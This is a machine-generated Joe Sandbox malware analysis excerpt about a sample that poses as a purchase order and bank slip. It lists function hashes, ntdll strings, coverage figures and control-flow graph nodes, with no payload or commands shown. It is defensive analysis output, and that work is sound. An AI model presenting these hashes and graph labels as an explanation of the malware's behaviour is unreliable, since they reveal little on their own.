                                                                                                        Similarity
                                                                                                        • API ID: ___swprintf_l
                                                                                                        • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                        • API String ID: 48624451-2108815105
                                                                                                        • Opcode ID: 3984864962ffd206435a452c4f62a95ad2eba53939babf565037f0def3d438c0
                                                                                                        • Instruction ID: 74fad6ec5455cf71629af8be2d18d19d821f75ede45a8b59d2a52d845f259943
                                                                                                        • Opcode Fuzzy Hash: 3984864962ffd206435a452c4f62a95ad2eba53939babf565037f0def3d438c0
                                                                                                        • Instruction Fuzzy Hash: 0F51F9B5A0421ABFDB25DBACCC9097EFBF8BB082407148169F455E7646D374DF4187A0
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.1974347040.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_1760000_PO1268931024 - Bank Slip.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ___swprintf_l
                                                                                                        • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                        • API String ID: 48624451-2108815105
                                                                                                        • Opcode ID: c51f1d8cf00e59f292c841046492e08cbfdfa8749b84e4aece1b7b697e11b3ce
                                                                                                        • Instruction ID: 7e997d2febe126dace6dbb33cc9d665e1c2cc5b46bd2a691250507c46d86bfa7
                                                                                                        • Opcode Fuzzy Hash: c51f1d8cf00e59f292c841046492e08cbfdfa8749b84e4aece1b7b697e11b3ce
                                                                                                        • Instruction Fuzzy Hash: 2951F575A08649AFCB20DE9CD89097EFBFAEF48300B048459F496C7641EAB4DB40C7A0
                                                                                                        Strings
                                                                                                        • Execute=1, xrefs: 01804713
                                                                                                        • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01804655
                                                                                                        • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01804725
                                                                                                        • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 018046FC
                                                                                                        • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01804742
                                                                                                        • CLIENT(ntdll): Processing section info %ws..., xrefs: 01804787
                                                                                                        • ExecuteOptions, xrefs: 018046A0
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.1974347040.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_1760000_PO1268931024 - Bank Slip.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                        • API String ID: 0-484625025
                                                                                                        • Opcode ID: 40cff2c5f4fbccf5d7a38e444d457ca23646368f486634c129314aa4e467f835
                                                                                                        • Instruction ID: 14a3957569050ce24abca95974e5778a089ec17e6449d15975882edd4cc000dc
                                                                                                        • Opcode Fuzzy Hash: 40cff2c5f4fbccf5d7a38e444d457ca23646368f486634c129314aa4e467f835
                                                                                                        • Instruction Fuzzy Hash: 4D51267160021DAAEF25AAA8DC99BAEF7B8EF14B00F0400EDD605A7181EB709B458F50
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.1974347040.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_1760000_PO1268931024 - Bank Slip.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
                                                                                                        • Instruction ID: 8611d5f5d13247184e70757ab4a8adbc029d1cc6aea9a5983d179d346d77a880
                                                                                                        • Opcode Fuzzy Hash: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
                                                                                                        • Instruction Fuzzy Hash: B3021671508382AFD305CF18C894A6BBBE9EFC4704F148A2DF9858B254EB35EA45CB42
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.1974347040.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_1760000_PO1268931024 - Bank Slip.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: __aulldvrm
                                                                                                        • String ID: +$-$0$0
                                                                                                        • API String ID: 1302938615-699404926
                                                                                                        • Opcode ID: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                                                        • Instruction ID: 60d5923a0da840c0473ac73ac1afda2e3b02cbcc376b00b8fb326f8d6b00d551
                                                                                                        • Opcode Fuzzy Hash: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                                                        • Instruction Fuzzy Hash: 9D81A070E4524D9FEF258E6CC8917FEFBB1AF46360F1E425AE861A7291C7349840CB61
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.1974347040.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_1760000_PO1268931024 - Bank Slip.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ___swprintf_l
                                                                                                        • String ID: %%%u$[$]:%u
                                                                                                        • API String ID: 48624451-2819853543
                                                                                                        • Opcode ID: 96b51515d9a49118bf7fadd51163d17543b38cbd81d33b0649b4783178d8226c
                                                                                                        • Instruction ID: 91eb755b2e585d7b8bae1926066ec4f3dd823c38b30fe142a21e609db9107605
                                                                                                        • Opcode Fuzzy Hash: 96b51515d9a49118bf7fadd51163d17543b38cbd81d33b0649b4783178d8226c
                                                                                                        • Instruction Fuzzy Hash: CD21517AA0051DABDB10DF69D844AAEBBF9AF58744F040126F905E3204EB30EA01CBA1
                                                                                                        Strings
                                                                                                        • RTL: Re-Waiting, xrefs: 0180031E
                                                                                                        • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 018002E7
                                                                                                        • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 018002BD
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.1974347040.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_1760000_PO1268931024 - Bank Slip.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                        • API String ID: 0-2474120054
                                                                                                        • Opcode ID: 44cb80b936c91fef0c63ad4eeff5b2c9a99cd392dc5ddca842d45d5c147b25f8
                                                                                                        • Instruction ID: d67ed5f69d91113b7b4912a22249ac0df49a3e257da353add00a1df56c8e8430
                                                                                                        • Opcode Fuzzy Hash: 44cb80b936c91fef0c63ad4eeff5b2c9a99cd392dc5ddca842d45d5c147b25f8
                                                                                                        • Instruction Fuzzy Hash: CCE1BC306087469FD726CF28CC84B6ABBE0BB84B54F140A6DF5A5CB2E1D774DA44CB42
                                                                                                        Strings
                                                                                                        • RTL: Resource at %p, xrefs: 01807B8E
                                                                                                        • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01807B7F
                                                                                                        • RTL: Re-Waiting, xrefs: 01807BAC
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.1974347040.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_1760000_PO1268931024 - Bank Slip.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                        • API String ID: 0-871070163
                                                                                                        • Opcode ID: 2009c07050155d3eca9412a86123cdaa369b4d7d194c8f6335c91e3c2064776b
                                                                                                        • Instruction ID: 5a2b8700d80ca0c5a83a9a4779922a41d3f5936c0a56f32b8947b7a7f66ae4a7
                                                                                                        • Opcode Fuzzy Hash: 2009c07050155d3eca9412a86123cdaa369b4d7d194c8f6335c91e3c2064776b
                                                                                                        • Instruction Fuzzy Hash: 7041CF317047079BD721DE29CC51B6AB7E5EB98B10F000A1DFA9ADB780DB31E9058B92
                                                                                                        APIs
                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0180728C
                                                                                                        Strings
                                                                                                        • RTL: Resource at %p, xrefs: 018072A3
                                                                                                        • RTL: Re-Waiting, xrefs: 018072C1
                                                                                                        • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01807294
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.1974347040.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_1760000_PO1268931024 - Bank Slip.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                        • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                        • API String ID: 885266447-605551621
                                                                                                        • Opcode ID: 6facce7decf71e09af56c5c8c335a7a8a50ee645aa7c8bc2cdfa55777cdd7939
                                                                                                        • Instruction ID: 7050d5ca363e4ae562d84603a738396d11b9213e6a98642fd6bae2c3901d61db
                                                                                                        • Opcode Fuzzy Hash: 6facce7decf71e09af56c5c8c335a7a8a50ee645aa7c8bc2cdfa55777cdd7939
                                                                                                        • Instruction Fuzzy Hash: 7341127160420AABC721CE29CC42B66F7A5FF94B50F10061CF996DB280DB30FA5687D1
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.1974347040.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_1760000_PO1268931024 - Bank Slip.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ___swprintf_l
                                                                                                        • String ID: %%%u$]:%u
                                                                                                        • API String ID: 48624451-3050659472
                                                                                                        • Opcode ID: ebceabd5d3423b14cf3304ca19404d3bcd8e95d5e1fede8e2a7c69c864f6a5e9
                                                                                                        • Instruction ID: 815873299e08316178778efd42b26061ff09c9749a755251a14a29620a59a8e0
                                                                                                        • Opcode Fuzzy Hash: ebceabd5d3423b14cf3304ca19404d3bcd8e95d5e1fede8e2a7c69c864f6a5e9
                                                                                                        • Instruction Fuzzy Hash: C0314F72A0062D9FDB20DF2DDC44BAEB7F9EB54710F54455AF949E3244EF30AA448BA0
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.1974347040.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_1760000_PO1268931024 - Bank Slip.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: __aulldvrm
                                                                                                        • String ID: +$-
                                                                                                        • API String ID: 1302938615-2137968064
                                                                                                        • Opcode ID: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                                        • Instruction ID: 7545df9eb6f2718606692a5f984381c105600b05939f10efcecd7f129ac1c82d
                                                                                                        • Opcode Fuzzy Hash: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                                        • Instruction Fuzzy Hash: 8291B271E0021E9BEB38DF6DC881ABEFBB1EF44328F54455AE955E72C4E73089818761
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.1974347040.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_1760000_PO1268931024 - Bank Slip.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: $$@
                                                                                                        • API String ID: 0-1194432280
                                                                                                        • Opcode ID: de824c4c3a53d4ec9959c307d3afd162fb85e0c815c6f57e330c104bb41df6bd
                                                                                                        • Instruction ID: 77ce82aa303c67f46c016b86ca409547d03810b0bafd4f46f87e2d02fd2ec5d3
                                                                                                        • Opcode Fuzzy Hash: de824c4c3a53d4ec9959c307d3afd162fb85e0c815c6f57e330c104bb41df6bd
                                                                                                        • Instruction Fuzzy Hash: 76810C71D002699BDB35CB54CC45BEEB7B4AF48714F1041DAEA19B7680E7309E84CFA0

                                                                                                        Execution Graph

                                                                                                        Execution Coverage:2.7%
                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                        Signature Coverage:0%
                                                                                                        Total number of Nodes:3
                                                                                                        Total number of Limit Nodes:0
                                                                                                        execution_graph 25524 6c29cfd 25525 6c29d17 25524->25525 25526 6c29d26 closesocket 25525->25526

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 271 433a9a5-433a9b3 272 433aa15-433aa2b 271->272 273 433a9b5 call 433a038 271->273 275 433aa33-433aa82 272->275 276 433aa2d 272->276 277 433a9ba-433a9bb 273->277 278 433aa84 275->278 279 433aa8a-433aad7 275->279 276->275 278->279 280 433aad9 279->280 281 433aadf-433ab3b 279->281 280->281
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.4158090763.00000000042A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 042A0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_42a0000_eiVHpMoiongmS.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 60840ff1d3d6c83c72dfa3690c564a1227479836e22c21005ff50a422e0441b9
                                                                                                        • Instruction ID: 66ed6020b9f97784c304a87dfaa8da5b6298fc0597c9899c2585df662d1af596
                                                                                                        • Opcode Fuzzy Hash: 60840ff1d3d6c83c72dfa3690c564a1227479836e22c21005ff50a422e0441b9
                                                                                                        • Instruction Fuzzy Hash: 2031B2126597F14ED30E836D08BD675AEC28E5720274EC2EEDADA5F2F3C4888408D3A1

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 0 433a038-433a493 1 433a4a4-433a4ad 0->1 2 433a4af-433a4bc 1->2 3 433a4be-433a4c8 1->3 2->1 4 433a4d9-433a4e5 3->4 6 433a4e7-433a4f0 4->6 7 433a4fd-433a515 4->7 8 433a4f2-433a4f8 6->8 9 433a4fb 6->9 10 433a526-433a52f 7->10 8->9 9->4 12 433a531-433a544 10->12 13 433a546-433a54f 10->13 12->10 15 433a551-433a569 13->15 16 433a56b-433a575 13->16 15->13 17 433a586-433a58f 16->17 18 433a591-433a59d 17->18 19 433a59f-433a5b3 17->19 18->17 21 433a5c4-433a5d0 19->21 22 433a5d2-433a5df 21->22 23 433a5e1-433a5e8 21->23 22->21 25 433a5ea-433a607 23->25 26 433a609-433a612 23->26 25->23 27 433a7c0-433a7ca 26->27 28 433a618-433a622 26->28 29 433a7db-433a7e4 27->29 30 433a633-433a63f 28->30 31 433a7e6-433a7f2 29->31 32 433a7f4-433a7fb 29->32 33 433a641-433a64a 30->33 34 433a657-433a661 30->34 31->29 37 433a820-433a82a 32->37 38 433a7fd-433a813 32->38 39 433a655 33->39 40 433a64c-433a652 33->40 35 433a672-433a67e 34->35 45 433a680-433a68d 35->45 46 433a68f-433a699 35->46 44 433a83b-433a844 37->44 41 433a815-433a81b 38->41 42 433a81e 38->42 39->30 40->39 41->42 42->32 47 433a846-433a84f 44->47 48 433a85c-433a865 44->48 45->35 50 433a6aa-433a6b6 46->50 51 433a851-433a854 47->51 52 433a85a 47->52 55 433a967-433a971 48->55 56 433a86b-433a87b 48->56 53 433a6d4-433a6de 50->53 54 433a6b8-433a6c4 50->54 51->52 52->44 62 433a712-433a71c 53->62 63 433a6e0-433a6ff 53->63 58 433a6d2 54->58 59 433a6c6-433a6cc 54->59 61 433a982-433a98e 55->61 56->56 60 433a87d-433a881 56->60 58->50 59->58 66 433a883-433a89a 60->66 67 433a89c-433a8a6 60->67 68 433a990-433a99c 61->68 69 433a99e-433a9a4 61->69 64 433a72d-433a736 62->64 70 433a701-433a70a 63->70 71 433a710 63->71 72 433a738-433a74a 64->72 73 433a74c-433a765 64->73 66->60 74 433a8b7-433a8c0 67->74 68->61 70->71 71->53 72->64 77 433a776-433a77f 73->77 78 433a8c2-433a8d4 74->78 79 433a8d6-433a8ed 74->79 82 433a781-433a793 77->82 83 433a795-433a7a7 77->83 78->74 81 433a8f8-433a8ff 79->81 84 433a901-433a928 81->84 85 433a92a call 4354f78 81->85 82->77 87 433a7b2-433a7bb 83->87 88 433a7a9-433a7b0 83->88 89 433a8ef-433a8f5 84->89 91 433a92f-433a93c 85->91 87->26 88->27 89->81 92 433a94d-433a959 91->92 92->55 93 433a95b-433a965 92->93 93->92
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.4158090763.00000000042A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 042A0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_42a0000_eiVHpMoiongmS.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: "$#$($($+$-$-O$1$8L$:$:$<V$?%$BA$C$Pf$Pf$T$WA$]$^$b$c}$d$t$v"$vO$y$,$6
                                                                                                        • API String ID: 0-904472534
                                                                                                        • Opcode ID: 8967e8ea9d4151fd1ac004421b17ebc51aa6da070bfaaa4bc2d454741e874210
                                                                                                        • Instruction ID: bc7fe372e2649c033816d4b787e295f711df3cfc85c0debb89a45e20a43174b4
                                                                                                        • Opcode Fuzzy Hash: 8967e8ea9d4151fd1ac004421b17ebc51aa6da070bfaaa4bc2d454741e874210
                                                                                                        • Instruction Fuzzy Hash: 9042C1B0D0562ACBEB28CF44C988BEDBBB1BF44309F1091D9C5596B784E3B56A85DF40

                                                                                                        Control-flow Graph

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.4158090763.00000000042A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 042A0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_42a0000_eiVHpMoiongmS.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 6$@4>J$O$S$s
                                                                                                        • API String ID: 0-336573888
                                                                                                        • Opcode ID: 008458fec8e27a19390f8bdf261c795cad7c23d34029cce3494b6d1879b9de6f
                                                                                                        • Instruction ID: 099a9e4d6eda7f73fff7e22cc5340ef5fb0e846bd3b0f030aa28672a0adb79c2
                                                                                                        • Opcode Fuzzy Hash: 008458fec8e27a19390f8bdf261c795cad7c23d34029cce3494b6d1879b9de6f
                                                                                                        • Instruction Fuzzy Hash: 1751A2B2911218ABDB10DFD4EC45EFEF3B8EF85314F1095A9ED0867150E770BA088BA1

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 142 6c29cfd-6c29d34 call 6c0189d call 6c2a8fd closesocket
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.4162936515.0000000006BA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 06BA0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_6ba0000_eiVHpMoiongmS.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: closesocket
                                                                                                        • String ID:
                                                                                                        • API String ID: 2781271927-0
                                                                                                        • Opcode ID: 3c3f9efd77772d6bb4266c3ce1fc24f890e350a37af8794a1638db82256047b5
                                                                                                        • Instruction ID: 653df2a69da7ab63ffd3be8b0577c8a342194011e5232044650bbd0db23f2dd8
                                                                                                        • Opcode Fuzzy Hash: 3c3f9efd77772d6bb4266c3ce1fc24f890e350a37af8794a1638db82256047b5
                                                                                                        • Instruction Fuzzy Hash: AAE08C322003547BC250EAA9DC40EEBB36CDFC9320F04451AFA28A7201C670B95287F4

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 165 4354f78-4354fd6 call 4331388 168 4354ff3-4354ff9 165->168 169 4354fd8 call 4336fc8 165->169 171 4354fdd-4354ff0 call 4331208 169->171 171->168
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.4158090763.00000000042A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 042A0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_42a0000_eiVHpMoiongmS.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: .|
                                                                                                        • API String ID: 0-325920452
                                                                                                        • Opcode ID: 178c32d8e1404a5789e4a2b4f9abf3e5fd93f9c54762f527bd92632bee4a25b9
                                                                                                        • Instruction ID: 8cafeb9651597d265388b32aba59671b075480a2b91154cf466b4ec385ad598c
                                                                                                        • Opcode Fuzzy Hash: 178c32d8e1404a5789e4a2b4f9abf3e5fd93f9c54762f527bd92632bee4a25b9
                                                                                                        • Instruction Fuzzy Hash: 2501EDF2C11219AFDF50DFE8D9419EEBBF8AF08205F14466AE819F3240F7745A048BA1

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 209 4333988-43339c5 210 43339c8-43339da call 4347b98 209->210 213 43339f8-4333a31 call 4358618 210->213 214 43339dc-43339e6 210->214 218 4333a36-4333a3b 213->218 214->210 215 43339e8-43339f7 214->215 218->215 219 4333a3d-4333a59 call 4357f18 218->219 219->215 222 4333a5b-4333a7e call 43586f8 219->222 222->215 225 4333a84-4333aa7 call 43586f8 222->225 225->215 228 4333aad-4333acb 225->228
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.4158090763.00000000042A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 042A0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_42a0000_eiVHpMoiongmS.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: a01469972955d78d782119378aacec6f2fc244d744f91c263757adf1f59e3886
                                                                                                        • Instruction ID: e541edb96d4bd33ee26133549de31b7312adefb7ea228953d6ec4ccfbe3ed29a
                                                                                                        • Opcode Fuzzy Hash: a01469972955d78d782119378aacec6f2fc244d744f91c263757adf1f59e3886
                                                                                                        • Instruction Fuzzy Hash: B94109B1D11218AFDB14CF99CC81AEEBBBCEF49710F10415AFA14E6240E7B1A640CBE4

                                                                                                        Control-flow Graph

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.4158090763.00000000042A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 042A0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_42a0000_eiVHpMoiongmS.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 09255f75fd08aaf16a15e8c7a8ecc55cb742fe4f6a110c8cfe71c3456905ff00
                                                                                                        • Instruction ID: f1bcc5aac5a47ed8ea68ae84a403aff7e7f73c7ab4e70707770f479cccc4f598
                                                                                                        • Opcode Fuzzy Hash: 09255f75fd08aaf16a15e8c7a8ecc55cb742fe4f6a110c8cfe71c3456905ff00
                                                                                                        • Instruction Fuzzy Hash: 8F31B6B5A01248AFDB14DF98D881EDEBBF9EF88304F108119FD19A7340D774A955CB60

                                                                                                        Control-flow Graph

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.4158090763.00000000042A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 042A0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_42a0000_eiVHpMoiongmS.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: dd8e6a020eed22182841d26150f8e485d3ee1976af8ba434d9872f59c73314c6
                                                                                                        • Instruction ID: 26d28780f8f183952d82f66697872ad88f4261ac1490bae222f96006b4c8e07c
                                                                                                        • Opcode Fuzzy Hash: dd8e6a020eed22182841d26150f8e485d3ee1976af8ba434d9872f59c73314c6
                                                                                                        • Instruction Fuzzy Hash: 3D31C6B5A00248AFDB14DF98D841EEEBBB9EF88304F108219FD19A7240D774A911CBA1
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.4158090763.00000000042A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 042A0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_42a0000_eiVHpMoiongmS.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: e49d7d781ca1d42782ed8ed3baac62c4f9d5a224fa7d698913f86c307f43200a
                                                                                                        • Instruction ID: df54265800a6a13e88f81aac2659805f9e5d9cda9353b84ef9c4beb80f8f7d9c
                                                                                                        • Opcode Fuzzy Hash: e49d7d781ca1d42782ed8ed3baac62c4f9d5a224fa7d698913f86c307f43200a
                                                                                                        • Instruction Fuzzy Hash: EA3107B5A40249AFDB14EF98C841EEFB7B9EF89305F108209FD18A7250D774A911CBA1
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.4158090763.00000000042A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 042A0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_42a0000_eiVHpMoiongmS.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 6a1bdd7762dbb37f2361fb4664322d838bbadab6eb27eab88a1dcf778f622d32
                                                                                                        • Instruction ID: 8ead276a01d83a04f111b2450248ccc58a6bf1cb260779a8234239e53b3a4b29
                                                                                                        • Opcode Fuzzy Hash: 6a1bdd7762dbb37f2361fb4664322d838bbadab6eb27eab88a1dcf778f622d32
                                                                                                        • Instruction Fuzzy Hash: 79210AB1A00209AFEB14EF98DC41EEFB7B9EF89305F008509FD19A7240D774A915CBA1
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.4158090763.00000000042A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 042A0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_42a0000_eiVHpMoiongmS.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 7058cc763f1e037f9ef1ad2052d21270ed5e1d0541c0bfc6aaf84d6af7122c89
                                                                                                        • Instruction ID: a4e14613aae4315e7b406714491f4bab041537e95c91424e6b30ff04c7c9244a
                                                                                                        • Opcode Fuzzy Hash: 7058cc763f1e037f9ef1ad2052d21270ed5e1d0541c0bfc6aaf84d6af7122c89
                                                                                                        • Instruction Fuzzy Hash: B8117CB23803097AF720AA559C83FAB775D9F85B24F244019FF18AB2C0D6A5B81147B8
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.4158090763.00000000042A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 042A0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_42a0000_eiVHpMoiongmS.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 16c797236095ebb5135ad2d4b33628f1c70fb897fe7ea92cf3538fbd2cf386a6
                                                                                                        • Instruction ID: 6210e81274906f48f6fa9f5f7f62c80f5583c44d85d8c7d13c7c3604af600e31
                                                                                                        • Opcode Fuzzy Hash: 16c797236095ebb5135ad2d4b33628f1c70fb897fe7ea92cf3538fbd2cf386a6
